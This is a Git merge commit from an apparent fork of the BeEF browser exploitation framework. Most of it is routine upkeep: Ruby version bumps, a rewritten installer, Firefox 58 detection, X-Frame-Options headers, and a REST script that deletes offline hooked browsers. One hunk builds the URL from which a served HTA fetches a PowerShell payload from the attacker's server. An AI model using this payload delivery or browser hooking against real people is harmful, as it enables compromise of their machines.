Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'master' into 1333_rate_merged

Browse Source
This commit is contained in:
Brendan Coles
2018-03-08 00:28:52 +11:00
committed by GitHub
parent b9eb6b7780 f6089c70e8
commit 4e4a0585f4
14 changed files with 315 additions and 280 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
Gemfile
View File

@@ -69,6 +69,9 @@ end
# DNS extension # DNS extension
group :ext_dns do group :ext_dns do
gem 'rubydns', '~> 0.7.3' gem 'rubydns', '~> 0.7.3'
# rubydns requires rainbow
# which requires rake, but doesn't specify rake as a dependency
gem 'rake'
end end
# network extension # network extension

132
INSTALL.txt
View File

@@ -6,98 +6,66 @@
=============================================================================== ===============================================================================
Source
------
Obtain application source code either by downloading the latest archive:
$ wget https://github.com/beefproject/beef/archive/master.zip
Or cloning the Git repository from Github:
$ git clone https://github.com/beefproject/beef
Prerequisites
--------------
BeEF requires Ruby 2.3+.
If your operating system package manager does not support Ruby version 2.3,
you can add the brightbox ppa repository for the latest version of Ruby:
$ sudo apt-add-repository -y ppa:brightbox/ruby-ng
Alternatively, consider using a Ruby environment manager such as rbenv or rvm
to manager your Ruby versions. Refer to the following for more information:
* rbenv: https://github.com/rbenv/rbenv
* rvm: https://rvm.io/rvm/install'
Installation Installation
------------ ------------
1. Prerequisites (platform independent) Once Ruby is installed, run the install script in the BeEF directory:
2. Prerequisites (Windows)
3. Prerequisites (Linux) ./install
4. Prerequisites (Mac OSX)
5. Install instructions This script installs the required operating system packages and all the
6. Run instructions prerequisite Ruby gems.
Upon successful installation, be sure to read the Configuration page
on the wiki for important details on configuring and securing BeEF.
https://github.com/beefproject/beef/wiki/Configuration
Start BeEF
----------
1. Prerequisites (platform independent) To start BeEF, simply run:
BeEF requires Ruby 2.2+ and the "bundler" gem. Bundler can be installed by: $ ./beef
gem install bundler
2. Prerequisites (Windows)
Windows is no longer supported. The following instructions are outdated.
!!! This must be done PRIOR to running the bundle install command !!!
Windows requires the sqlite.dll. Simply grab the zip file below and extract it to your Ruby bin directory:
http://www.sqlite.org/sqlitedll-3_7_0_1.zip
Other than that, you also need TheRubyRacer. As it's painful to install it on Windows, you can download 2 pre-compiled V8 DLLs and 2 gems from https://github.com/eakmotion/therubyracer_for_windows.
Finally, edit beef's gem lock file by replacing the required ruby racer version with the version downloaded from the link above.
3. Prerequisites (Linux)
!!! This must be done PRIOR to running the bundle install command !!!
On linux you will need to find the packages specific to your distribution for sqlite. An example build script for Ubuntu 14.04 systems is:
# Set your prefered build dir
BUILDDIR=/opt && \
cd $BUILDDIR && \
\
# Install dependences
sudo apt-get update && \
sudo apt-get install -y \
build-essential \
git \
libsqlite3-dev \
software-properties-common \
sqlite3 \
sqlite3-doc && \
\
# Add brightbox ppa for the latest version of ruby
sudo apt-add-repository -y \
ppa:brightbox/ruby-ng && \
\
# Install ruby (2.2 in this example)
sudo apt-get update && \
sudo apt-get install -y \
ruby2.2 \
ruby2.2-dev && \
\
# Install bundler using gem
sudo gem install bundler
3.1. It is recommended not to use rvm. If you use rvm the ruby binaries are installed to locations outside of your default path which may cause problems later.
4. Prerequisites (Mac OSX)
- XCode: provides the sqlite support BeEF needs
- Ruby 2.1
To install RVM and Ruby 2.1.5 on Mac OS:
$ bash -s stable < <(curl -Ls https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile
$ rvm install 2.1.5
$ rvm use 2.1.5
5. Install instructions Updating
--------
Obtain application code either by downloading an archive from https://github.com/beefproject/beef/archive/master.zip or cloning the GIT repo https://github.com/beefproject/beef.git
Enter into the newly created BeEF directory, and type: Due to the fast-paced nature of web browser development and webappsec landscape,
it's best to regularly update BeEF to the latest version.
bundle install If you're using BeEF from the GitHub repository, updating is as simple as:
Bundler installs all the pre-requisite gems. $ git pull
6. Run instructions
Simply run:
./beef -x

12
README.mkd → README.md
View File

@@ -36,9 +36,9 @@ __Twitter:__ @beefproject
Requirements Requirements
------------ ------------
* OSX 10.5.0 or higher, modern Linux * Operating System: Mac OSX 10.5.0 or higher / modern Linux
* [Ruby](http://rubylang.org) version 2.2 or newer * [Ruby](http://rubylang.org): 2.3 or newer
* [SQLite](http://sqlite.org) 3.x * [SQLite](http://sqlite.org): 3.x
* The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile * The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile
@@ -47,12 +47,14 @@ Quick Start
__The following is for the impatient.__ __The following is for the impatient.__
The `install` script installs the required operating system packages and all the prerequisite Ruby gems:
$ ./install
For full installation details, please refer to [INSTALL.txt](https://github.com/beefproject/beef/blob/master/INSTALL.txt). For full installation details, please refer to [INSTALL.txt](https://github.com/beefproject/beef/blob/master/INSTALL.txt).
We also have an [Installation](https://github.com/beefproject/beef/wiki/Installation) page on the wiki. We also have an [Installation](https://github.com/beefproject/beef/wiki/Installation) page on the wiki.
$ curl -L https://raw.githubusercontent.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
Upon successful installation, be sure to read the [Configuration](https://github.com/beefproject/beef/wiki/Configuration) page on the wiki for important details on configuring and securing BeEF. Upon successful installation, be sure to read the [Configuration](https://github.com/beefproject/beef/wiki/Configuration) page on the wiki for important details on configuring and securing BeEF.

6
beef
View File

@@ -12,11 +12,11 @@
$VERBOSE = nil $VERBOSE = nil
# #
# @note Version check to ensure BeEF is running Ruby 2.2+ # @note Version check to ensure BeEF is running Ruby 2.3+
# #
if RUBY_VERSION < '2.2' if RUBY_VERSION < '2.3'
puts puts
puts "Ruby version #{RUBY_VERSION} is no longer supported. Please upgrade to Ruby version 2.2 or later." puts "Ruby version #{RUBY_VERSION} is no longer supported. Please upgrade to Ruby version 2.3 or later."
puts puts
exit 1 exit 1
end end

15
core/main/client/browser.js
View File

@@ -589,13 +589,21 @@ beef.browser = {
isFF57: function () { isFF57: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/57./) != null; return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/57./) != null;
}, },
/**
* Returns true if FF58
* @example: beef.browser.isFF58()
*/
isFF58: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/58./) != null;
},
/** /**
* Returns true if FF. * Returns true if FF.
* @example: beef.browser.isFF() * @example: beef.browser.isFF()
*/ */
isFF: function () { isFF: function () {
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31() || this.isFF32() || this.isFF33() || this.isFF34() || this.isFF35() || this.isFF36() || this.isFF37() || this.isFF38() || this.isFF39() || this.isFF40() || this.isFF41() || this.isFF42() || this.isFF43() || this.isFF44() || this.isFF45() || this.isFF46() || this.isFF47() || this.isFF48() || this.isFF49() || this.isFF50() || this.isFF51() || this.isFF52() || this.isFF53() || this.isFF54() || this.isFF55() || this.isFF56() || this.isFF57(); return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31() || this.isFF32() || this.isFF33() || this.isFF34() || this.isFF35() || this.isFF36() || this.isFF37() || this.isFF38() || this.isFF39() || this.isFF40() || this.isFF41() || this.isFF42() || this.isFF43() || this.isFF44() || this.isFF45() || this.isFF46() || this.isFF47() || this.isFF48() || this.isFF49() || this.isFF50() || this.isFF51() || this.isFF52() || this.isFF53() || this.isFF54() || this.isFF55() || this.isFF56() || this.isFF57() || this.isFF58();
}, },
/** /**
@@ -1659,6 +1667,7 @@ beef.browser = {
FF55: this.isFF55(), // Firefox 55 FF55: this.isFF55(), // Firefox 55
FF56: this.isFF56(), // Firefox 56 FF56: this.isFF56(), // Firefox 56
FF57: this.isFF57(), // Firefox 57 FF57: this.isFF57(), // Firefox 57
FF58: this.isFF58(), // Firefox 58
FF: this.isFF(), // Firefox any version FF: this.isFF(), // Firefox any version
IE6: this.isIE6(), // Internet Explorer 6 IE6: this.isIE6(), // Internet Explorer 6
@@ -2305,6 +2314,10 @@ beef.browser = {
return '57' return '57'
} }
; // Firefox 57 ; // Firefox 57
if (this.isFF58()) {
return '58'
}
; // Firefox 58
if (this.isIE6()) { if (this.isIE6()) {
return '6' return '6'

3
extensions/admin_ui/controllers/authentication/authentication.rb
View File

@@ -31,6 +31,7 @@ class Authentication < BeEF::Extension::AdminUI::HttpController
# Function managing the index web page # Function managing the index web page
def index def index
@headers['Content-Type']='text/html; charset=UTF-8' @headers['Content-Type']='text/html; charset=UTF-8'
@headers['X-Frame-Options']='sameorigin'
end end
# #
@@ -42,6 +43,7 @@ class Authentication < BeEF::Extension::AdminUI::HttpController
password = @params['password-cfrm'] || '' password = @params['password-cfrm'] || ''
config = BeEF::Core::Configuration.instance config = BeEF::Core::Configuration.instance
@headers['Content-Type']='application/json; charset=UTF-8' @headers['Content-Type']='application/json; charset=UTF-8'
@headers['X-Frame-Options']='sameorigin'
ua_ip = @request.ip # get client ip address ua_ip = @request.ip # get client ip address
@body = '{ success : false }' # attempt to fail closed @body = '{ success : false }' # attempt to fail closed
@@ -85,6 +87,7 @@ class Authentication < BeEF::Extension::AdminUI::HttpController
(print_error "invalid session";return @body = "{ success : true }") if not @session.valid_session?(@request) (print_error "invalid session";return @body = "{ success : true }") if not @session.valid_session?(@request)
@headers['Content-Type']='application/json; charset=UTF-8' @headers['Content-Type']='application/json; charset=UTF-8'
@headers['X-Frame-Options']='sameorigin'
# set the session to be log out # set the session to be log out
@session.set_logged_out @session.set_logged_out

2
extensions/admin_ui/controllers/panel/index.html
View File

@@ -27,7 +27,7 @@
<div class="right-menu"> <div class="right-menu">
<img src="<%= base_path %>/media/images/favicon.png" /> <img src="<%= base_path %>/media/images/favicon.png" />
BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> | BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> |
<a id='do-submit-bug-menu' href='https://github.com/beefproject/beef/issues/new' target='_blank'>Submit Bug</a> | <a id='do-submit-bug-menu' href='https://github.com/beefproject/beef/issues' target='_blank'>Submit Bug</a> |
<a id='do-logout-menu' href='#'>Logout</a> <a id='do-logout-menu' href='#'>Logout</a>
</div> </div>
</div> </div>

3
extensions/admin_ui/controllers/panel/panel.rb
View File

@@ -23,7 +23,8 @@ module BeEF
end end
# default index page # default index page
def index; def index
@headers['X-Frame-Options']='sameorigin'
end end
# return a JSON object contains all the updates for the hooked browser trees # return a JSON object contains all the updates for the hooked browser trees

3
extensions/social_engineering/powershell/bind_powershell.rb
View File

@@ -30,8 +30,9 @@ module BeEF
response['Content-Type'] = "application/hta" response['Content-Type'] = "application/hta"
host = BeEF::Core::Configuration.instance.get('beef.http.public') || BeEF::Core::Configuration.instance.get('beef.http.host') host = BeEF::Core::Configuration.instance.get('beef.http.public') || BeEF::Core::Configuration.instance.get('beef.http.host')
port = BeEF::Core::Configuration.instance.get('beef.http.public_port') || BeEF::Core::Configuration.instance.get('beef.http.port') port = BeEF::Core::Configuration.instance.get('beef.http.public_port') || BeEF::Core::Configuration.instance.get('beef.http.port')
proto = BeEF::Core::Configuration.instance.get("beef.http.https.enable") == true ? "https" : "http"
ps_url = BeEF::Core::Configuration.instance.get('beef.extension.social_engineering.powershell.powershell_handler_url') ps_url = BeEF::Core::Configuration.instance.get('beef.extension.social_engineering.powershell.powershell_handler_url')
payload_url = "http://#{host}:#{port}#{ps_url}/ps.png" payload_url = "#{proto}://#{host}:#{port}#{ps_url}/ps.png"
print_info "Serving HTA. Powershell payload will be retrieved from: #{payload_url}" print_info "Serving HTA. Powershell payload will be retrieved from: #{payload_url}"
"<script> "<script>

135
install
View File

@@ -1,26 +1,133 @@
#!/usr/bin/env ruby #!/bin/bash
# #
# Copyright (c) 2006-2018 Wade Alcorn - wade@bindshell.net # Copyright (c) 2006-2018 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com # Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission # See the file 'doc/COPYING' for copying permission
# #
puts "\nWelcome to the BeEF installer!" set -euo pipefail
IFS=$'\n\t'
if RUBY_VERSION < '2.2' clear
puts "\n"
puts "Ruby version #{RUBY_VERSION} is no longer supported. Please upgrade to Ruby version 2.2 or later."
puts "\n"
exit 1
end
puts "\nPlease make sure you have installed SQLite before proceeding. For instructions on how to do this please see the README file" if [ -f core/main/console/beef.ascii ] ; then
cat core/main/console/beef.ascii
echo
fi
puts "\nInstall Bundler: gem install bundler" echo "#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#"
echo " -- [ BeEF Installer ] -- "
echo "#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#"
echo
puts "\nRun bundler in your BeEF folder: bundle install" command_exists () {
command -v "$1" /dev/null 2&>1
}
puts "\nRun BeEF: ./beef" info() { echo "[INFO] $*"; }
warn() { echo "[WARN] $*"; }
error() { echo "[ERROR] $*"; }
fatal() { echo "[FATAL] $*"; exit 1 ; }
warn 'This script will install BeEF and its required dependencies (including operating system packages).'
read -p "Are you sure you wish to continue (Y/n)? "
if [ "`echo ${REPLY} | tr [:upper:] [:lower:]`" = "n" ] ; then
fatal 'Installation aborted'
fi
install_linux () {
info "Detecting Linux OS distribution..."
Distro=''
if [ -f /etc/redhat-release ] ; then
Distro='RedHat'
elif [ -f /etc/debian_version ] ; then
Distro='Debian'
elif [ -f /etc/os-release ] ; then
DISTRO_ID=`grep ^ID= /etc/os-release | cut -d= -f2-`
if [ "$DISTRO_ID" = 'kali' ] ; then
Distro='Kali'
fi
fi
if [ -z $Distro ] ; then
fatal "Unable to locate installer for your $OS distribution"
fi
readonly Distro
info "OS Distribution: $Distro"
info "Installing $Distro prerequisite packages..."
if [ "$Distro" = "Debian" -o "$Distro" = "Kali" ]; then
sudo apt-get update
sudo apt-get install curl git build-essential openssl libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libncurses5-dev automake libtool bison subversion nodejs
elif [ "$Distro" = "RedHat" ]; then
sudo yum install -y git make gcc openssl-devel gcc-c++ patch readline readline-devel zlib zlib-devel libyaml-devel libffi-devel bzip2 autoconf automake libtool bison iconv-devel sqlite-devel nodejs
fi
}
install_mac () {
echo
}
info "Detecting OS..."
OS=`uname`
readonly OS
info "Operating System: $OS"
if [ "${OS}" = "Linux" ] ; then
info "Launching Linux install..."
install_linux
elif [ "$OS" = "Darwin" ]; then
info "Launching Mac OSX install..."
install_mac
else
fatal "Unable to locate installer for your Operating system: $OS"
fi
info 'Detecting Ruby environment...'
MIN_RUBY_VER='2.3'
if command_exists ruby
then
RUBY_VERSION=`ruby -e "puts RUBY_VERSION"`
info "Ruby version ${RUBY_VERSION} is installed"
if [ `ruby -e "puts RUBY_VERSION.to_f >= ${MIN_RUBY_VER}"` = 'false' ]
then
fatal "Ruby version ${RUBY_VERSION} is not supported. Please install Ruby ${MIN_RUBY_VER} (or newer) and restart the installer."
fi
else
fatal "Ruby is not installed. Please install Ruby ${MIN_RUBY_VER} (or newer) and restart the installer."
fi
#if command_exists rbenv
#then
# info 'rbenv is installed'
#elif command_exists rvm
#then
# info 'rvm is installed'
#else
# fatal 'Could not find Ruby environment manager!
#Please install either RVM or rbenv and restart the installer
#For more information:
# * rbenv: https://github.com/rbenv/rbenv
# * rvm: https://rvm.io/rvm/install'
#fi
info 'Detecting bundler gem...'
if command_exists bundler
then
info 'bundler gem is installed'
else
info 'Installing bundler gem'
gem install bundler
fi
echo "Installing required Ruby gems..."
bundle install --without test development
echo
echo "=========================================="
echo
info "Install completed successfully!"
info "Run './beef' to launch BeEF"
echo
echo "=========================================="
echo
#Testing fork regroup

170
install-beef
View File

@@ -1,170 +0,0 @@
#!/bin/bash
#
# Copyright (c) 2006-2018 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
set -e
clear
echo "======================================"
echo " BeEF Installer "
echo "======================================"
echo ""
echo "CAUTION: This installation script will install a number of BeEF dependencies including the Ruby-RVM environment and its dependencies."
echo ""
echo "In rare cases, this may lead to unexpected behaviour or package conflicts on some systems."
echo ""
read -p "Are you sure you wish to continue (Y/n)? "
if [ "`echo ${REPLY} | tr [:upper:] [:lower:]`" == "n" ] ; then
exit;
fi
echo ""
echo "Detecting OS..";
OS=`uname`
if [ "${OS}" = "Linux" ] ; then
if [ -f /etc/redhat-release ] ; then
Distro='RedHat'
elif [ -f /etc/debian_version ] ; then
Distro='Debian'
fi
readonly OS
readonly Distro
fi
if [ "$OS" == "Darwin" ]; then
echo "Mac OSX Detected"
echo "Installing Ruby Version Manager (RVM) & Ruby 2.3.0.."
bash -s stable < <(curl -Ls https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
source ~/.bash_login
rvm install 2.3.0 --with-gcc=clang
rvm use 2.3.0
echo ""
echo "Downloading BeEF.."
git clone git://github.com/beefproject/beef.git
cd beef
echo ""
echo "Installing Ruby Gems.."
bundle install
OK="yes"
./beef
echo ""
echo "=========================================="
echo " Install Complete"
echo "Please restart Terminal and Run BeEF with:"
echo " $ ./beef "
echo "=========================================="
echo ""
fi
if [ "$Distro" == "Debian" ]; then
echo "Debian/Ubuntu Detected"
echo "Installing Prerequisite Packages.."
sudo apt-get update
sudo apt-get install curl git
sudo apt-get install build-essential openssl libreadline6 libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libncurses5-dev automake libtool bison subversion nodejs
curl -Lsk https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash
echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"' >> ~/.bashrc
source ~/.bashrc
if [ -e $HOME/.rvm/scripts/rvm ]; then
source $HOME/.rvm/scripts/rvm
elif [ -e /usr/local/rvm/scripts/rvm ]; then
source /usr/local/rvm/scripts/rvm
else
source /etc/profile.d/rvm.sh
fi
rvm install 2.3.0
rvm use 2.3.0 --default
echo "Downloading BeEF.."
git clone git://github.com/beefproject/beef.git
cd beef
echo "Installing Ruby Gems"
gem install bundler
bundle install
./beef
OK="yes"
echo ""
echo "=========================================="
echo " Install Complete"
echo "=========================================="
echo ""
fi
if [ "$Distro" == "RedHat" ]; then
echo "Redhat/Fedora Detected"
echo "Installing Prerequisite Packages.."
sudo yum install -y git make gcc openssl-devel gcc-c++ patch readline readline-devel zlib zlib-devel libyaml-devel libffi-devel bzip2 autoconf automake libtool bison iconv-devel sqlite-devel nodejs
echo ""
echo "Installing Ruby Version Manager (RVM) & Ruby 2.3.0"
wget https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer
bash ./rvm-installer
source ~/.rvm/scripts/rvm
rvm pkg install openssl
rvm install 2.3.0 --with-openssl-dir=$rvm_path/usr
source ~/.rvm/scripts/rvm
rvm use 2.3.0 --default
echo "Downloading BeEF.."
git clone git://github.com/beefproject/beef.git
cd beef
gem install bundler
bundle
source ~/.bash_profile
./beef
OK="yes"
echo ""
echo "=========================================="
echo " Install Complete"
echo "=========================================="
echo ""
fi
if [ "$OK" == "yes" ]; then
echo ""
else
echo ""
echo "======================================="
echo " Install Failed"
echo "Unable to locate installer for your OS:"
echo $OS
echo $Distro
echo "======================================="
echo ""
fi

4
test/common/ts_common.rb
View File

@@ -5,9 +5,9 @@
# #
# @note Version check to ensure BeEF is running Ruby 2.0+ # @note Version check to ensure BeEF is running Ruby 2.0+
if RUBY_VERSION < '2.2' if RUBY_VERSION < '2.3'
puts "\n" puts "\n"
puts "Ruby version #{RUBY_VERSION} is no longer supported. Please upgrade to Ruby version 2.2 or later." puts "Ruby version #{RUBY_VERSION} is no longer supported. Please upgrade to Ruby version 2.3 or later."
puts "\n" puts "\n"
exit 1 exit 1
end end

26
tools/rest_api_examples/lib/beef_rest_api.rb
View File

@@ -55,6 +55,20 @@ def online_browsers
end end
end end
# get offline hooked browsers
def offline_browsers
begin
print_verbose "Retrieving offline browsers"
response = RestClient.get "#{@url}hooks", {:params => {:token => @token}}
result = JSON.parse(response.body)
browsers = result["hooked-browsers"]["offline"]
print_good "Retrieved offline browser list [#{browsers.size} offline]"
browsers
rescue => e
print_error "Could not retrieve browser details: #{e.message}"
end
end
# get hooked browser details by session # get hooked browser details by session
def browser_details session def browser_details session
begin begin
@@ -68,6 +82,18 @@ def browser_details session
end end
end end
# delete a browser by session
def delete_browser session
begin
print_verbose "Removing hooked browser [session: #{session}]"
response = RestClient.get "#{@url}hooks/#{session}/delete", {:params => {:token => @token}}
print_good "Removed browser [session: #{session}]" if response.code == 200
response
rescue => e
print_error "Could not delete hooked browser: #{e.message}"
end
end
# get BeEF logs # get BeEF logs
def logs def logs
begin begin

81
tools/rest_api_examples/remove-offline-browsers Normal file
View File

@@ -0,0 +1,81 @@
#!/usr/bin/env ruby
# remove-offline-browsers - Example BeEF RESTful API script
# Removes offline browsers from the database
# Refer to the wiki for info: https://github.com/beefproject/beef/wiki/BeEF-RESTful-API
##
require 'rest-client'
require 'json'
require 'optparse'
require 'pp'
require './lib/string' # colored strings
require './lib/print' # print wrappers
require './lib/beef_rest_api'
if ARGV.length == 0
puts "#{$0}:"
puts "| Example BeEF RESTful API script"
puts "| Use --help for help"
puts "|_ Use verbose mode (-v) and debug mode (-d) for more output"
exit 1
end
# API config
proto = 'http'
host = '127.0.0.1'
port = '3000'
user = 'beef'
pass = 'beef'
# Command line options
@debug = false
@verbose = false
OptionParser.new do |opts|
opts.on('-h', '--help', 'Shows this help screen') do
puts opts
exit 1
end
opts.on('--host HOST', "Set BeEF host (default: #{host})") do |h|
host = h
end
opts.on('--port PORT', "Set BeEF port (default: #{port})") do |p|
port = p
end
opts.on('--user USERNAME', "Set BeEF username (default: #{user})") do |u|
user = u
end
opts.on('--pass PASSWORD', "Set BeEF password (default: #{pass})") do |p|
pass = p
end
opts.on('--ssl', 'Use HTTPS') do
proto = 'https'
end
opts.on('-v', '--verbose', 'Enable verbose output') do
@verbose = true
end
opts.on('-d', '--debug', 'Enable debug output') do
@debug = true
end
end.parse!
@api = BeefRestAPI.new proto, host, port, user, pass
# Retrieve the RESTful API token
print_status "Authenticating to: #{proto}://#{host}:#{port}"
@api.auth
# Retrieve BeEF version
@api.version
# Retrieve online hooked browser list
hooks = @api.offline_browsers.flatten
exit 1 if hooks.empty?
print_debug hooks
# Remove each offline browser
hooks.each do |hook|
next if hook['id'].nil?
print_status "Removing hooked browser [id: #{hook['id']}]"
details = @api.delete_browser(hook['session'])
print_debug details
end